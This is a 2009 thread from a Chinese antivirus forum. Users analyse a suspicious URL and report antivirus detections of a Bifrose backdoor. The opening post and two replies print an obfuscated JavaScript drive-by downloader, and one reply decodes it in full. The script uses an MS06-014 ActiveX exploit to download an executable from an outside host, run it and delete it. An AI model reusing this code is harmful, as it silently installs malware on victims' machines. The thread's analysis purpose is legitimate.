收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 看看這個地址有毒嗎?
12下一页
返回列表 发新帖
查看: 3222|回复: 10
收起左侧

[已鉴定] 看看這個地址有毒嗎?

[复制链接]
qq890
发表于 2009-3-3 18:00:22 | 显示全部楼层 |阅读模式
http://www.baareeq.com/baareeq/t3es.exe


<script language=JavaScript> m='%3Cscript%3E%0D%0Avar%20dc%3Ddocument.write%3B%0D%0Avar%20sc%3DString.fromCharCode%3B%0D%0Avar%20exe%3D%22http%3A//www.baareeq.com/baareeq/t3es.exe%22%3B%0D%0Adc%28sc%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C118%2C97%2C114%2C32%2C97%2C105%2C108%2C105%2C97%2C110%2C44%2C122%2C104%2C97%2C110%2C44%2C99%2C109%2C100%2C115%2C115%2C59%2C97%2C105%2C108%2C105%2C97%2C110%2C61%2C34%29%20+%20exe%20+%20sc%2834%2C59%2C122%2C104%2C97%2C110%2C61%2C34%2C119%2C105%2C110%2C46%2C101%2C120%2C101%2C34%2C59%2C99%2C109%2C100%2C115%2C115%2C61%2C34%2C99%2C109%2C100%2C46%2C101%2C120%2C101%2C34%2C59%2C116%2C114%2C121%2C123%2C118%2C97%2C114%2C32%2C97%2C100%2C111%2C61%2C40%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C34%2C111%2C98%2C106%2C101%2C99%2C116%2C34%2C41%2C41%2C59%2C118%2C97%2C114%2C32%2C100%2C61%2C49%2C59%2C97%2C100%2C111%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C40%2C34%2C99%2C108%2C97%2C115%2C115%2C105%2C100%2C34%2C44%2C34%2C99%2C108%2C115%2C105%2C100%2C58%2C66%2C68%2C57%2C54%2C67%2C53%2C53%2C54%2C45%2C54%2C53%2C65%2C51%2C45%2C49%2C49%2C68%2C48%2C45%2C57%2C56%2C51%2C65%2C45%2C48%2C48%2C67%2C48%2C52%2C70%2C67%2C50%2C57%2C69%2C51%2C54%2C34%2C41%2C59%2C118%2C97%2C114%2C32%2C101%2C61%2C49%2C59%2C118%2C97%2C114%2C32%2C120%2C109%2C108%2C61%2C97%2C100%2C111%2C46%2C67%2C114%2C101%2C97%2C116%2C101%2C79%2C98%2C106%2C101%2C99%2C116%2C40%2C34%2C77%2C105%2C99%2C114%2C111%2C115%2C111%2C102%2C116%2C46%2C88%2C77%2C76%2C72%2C84%2C84%2C80%2C34%2C44%2C34%2C34%2C41%2C59%2C118%2C97%2C114%2C32%2C102%2C61%2C49%2C59%2C118%2C97%2C114%2C32%2C108%2C110%2C61%2C34%2C65%2C100%2C111%2C34%2C59%2C118%2C97%2C114%2C32%2C108%2C122%2C110%2C61%2C34%2C100%2C98%2C46%2C83%2C116%2C34%2C59%2C118%2C97%2C114%2C32%2C97%2C110%2C61%2C34%2C114%2C101%2C97%2C109%2C34%2C59%2C118%2C97%2C114%2C32%2C103%2C61%2C49%2C59%2C118%2C97%2C114%2C32%2C97%2C115%2C61%2C97%2C100%2C111%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C111%2C98%2C106%2C101%2C99%2C116%2C40%2C108%2C110%2C43%2C108%2C122%2C110%2C43%2C97%2C110%2C44%2C34%2C34%2C41%2C59%2C118%2C97%2C114%2C32%2C104%2C61%2C49%2C59%2C120%2C109%2C108%2C46%2C79%2C112%2C101%2C110%2C40%2C34%2C71%2C69%2C84%2C34%2C44%2C97%2C105%2C108%2C105%2C97%2C110%2C44%2C48%2C41%2C59%2C120%2C109%2C108%2C46%2C83%2C101%2C110%2C100%2C40%2C41%2C59%2C97%2C115%2C46%2C116%2C121%2C112%2C101%2C61%2C49%2C59%2C118%2C97%2C114%2C32%2C110%2C61%2C49%2C59%2C97%2C115%2C46%2C111%2C112%2C101%2C110%2C40%2C41%2C59%2C97%2C115%2C46%2C119%2C114%2C105%2C116%2C101%2C40%2C120%2C109%2C108%2C46%2C114%2C101%2C115%2C112%2C111%2C110%2C115%2C101%2C66%2C111%2C100%2C121%2C41%2C59%2C97%2C115%2C46%2C115%2C97%2C118%2C101%2C116%2C111%2C102%2C105%2C108%2C101%2C40%2C122%2C104%2C97%2C110%2C44%2C50%2C41%2C59%2C97%2C115%2C46%2C99%2C108%2C111%2C115%2C101%2C40%2C41%2C59%2C118%2C97%2C114%2C32%2C115%2C104%2C101%2C108%2C108%2C61%2C97%2C100%2C111%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C111%2C98%2C106%2C101%2C99%2C116%2C40%2C34%2C83%2C104%2C101%2C108%2C108%2C46%2C65%2C112%2C112%2C108%2C105%2C99%2C97%2C116%2C105%2C111%2C110%2C34%2C44%2C34%2C34%2C41%2C59%2C115%2C104%2C101%2C108%2C108%2C46%2C83%2C104%2C101%2C108%2C108%2C69%2C120%2C101%2C99%2C117%2C116%2C101%2C40%2C122%2C104%2C97%2C110%2C44%2C34%2C34%2C44%2C34%2C34%2C44%2C34%2C111%2C112%2C101%2C110%2C34%2C44%2C48%2C41%2C59%2C115%2C104%2C101%2C108%2C108%2C46%2C83%2C104%2C101%2C108%2C108%2C69%2C120%2C101%2C99%2C117%2C116%2C101%2C40%2C99%2C109%2C100%2C115%2C115%2C44%2C34%2C32%2C47%2C99%2C32%2C100%2C101%2C108%2C32%2C47%2C83%2C32%2C47%2C81%2C32%2C47%2C70%2C32%2C34%2C43%2C122%2C104%2C97%2C110%2C44%2C34%2C34%2C44%2C34%2C111%2C112%2C101%2C110%2C34%2C44%2C48%2C41%2C59%2C125%2C99%2C97%2C116%2C99%2C104%2C40%2C101%2C41%2C123%2C125%2C59%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3B%0D%0A%3C/script%3E';d=unescape(m);document.write(d);</script>
回复

举报

板砖飞向我
发表于 2009-3-3 18:03:36 | 显示全部楼层
什么玩意
回复

举报

tanlimo
发表于 2009-3-3 18:08:45 | 显示全部楼层
病毒        2009-03-03  18:06:42        病毒在文件C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\0P2NWDUN\t3es[1].exe中        Win32.Hack.Bifrose.61179(后门程序)        拦截成功(文件被禁止访问)
回复

举报

Nicky
发表于 2009-3-3 18:11:26 | 显示全部楼层
Nod32擋了。。
回复

举报

Oday
发表于 2009-3-3 18:14:28 | 显示全部楼层
直接挡了
回答你:有.jpg
回复

举报

qigang
发表于 2009-3-3 18:39:49 | 显示全部楼层
<script language=JavaScript> m='<script>

var dc=document.write;

var sc=String.fromCharCode;

var exe="http://www.baareeq.com/baareeq/t3es.exe";

dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,108,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));

</script>';d=unescape(m);document.write(d);</script>
回复

举报

250662772
发表于 2009-3-3 19:43:49 | 显示全部楼层
MS-06014
<SCRIPT>var ailian,zhan,cmdss;ailian="http://www.baareeq.com/baareeq/t3es.exe";zhan="win.exe";cmdss="cmd.exe";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var as=ado.createobject(ln+lzn+an,"");var h=1;xml.Open("GET",ailian,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(zhan,2);as.close();var shell=ado.createobject("Shell.Application","");shell.ShellExecute(zhan,"","","open",0);shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0);}catch(e){};</SCRIPT>

[ 本帖最后由 250662772 于 2009-3-3 19:46 编辑 ]
回复

举报

yunaffx
发表于 2009-3-3 23:05:33 | 显示全部楼层
红伞报告:Virus or unwanted program 'HEUR/Malware [heuristic]'
detected in file 'C:\Documents and Settings\lenovo\Local Settings\Temporary Internet Files\Content.IE5\CE5O3M6S\t3es[1].exe.
Action performed: Deny access
回复

举报

西风萧雨
发表于 2009-3-4 08:24:54 | 显示全部楼层

微点报“未知”

1.jpg
回复

举报

haileyuxin
发表于 2009-3-4 11:24:08 | 显示全部楼层
webscc            js.adostream.XMLHTTP
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-6 01:57 , Processed in 0.130602 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表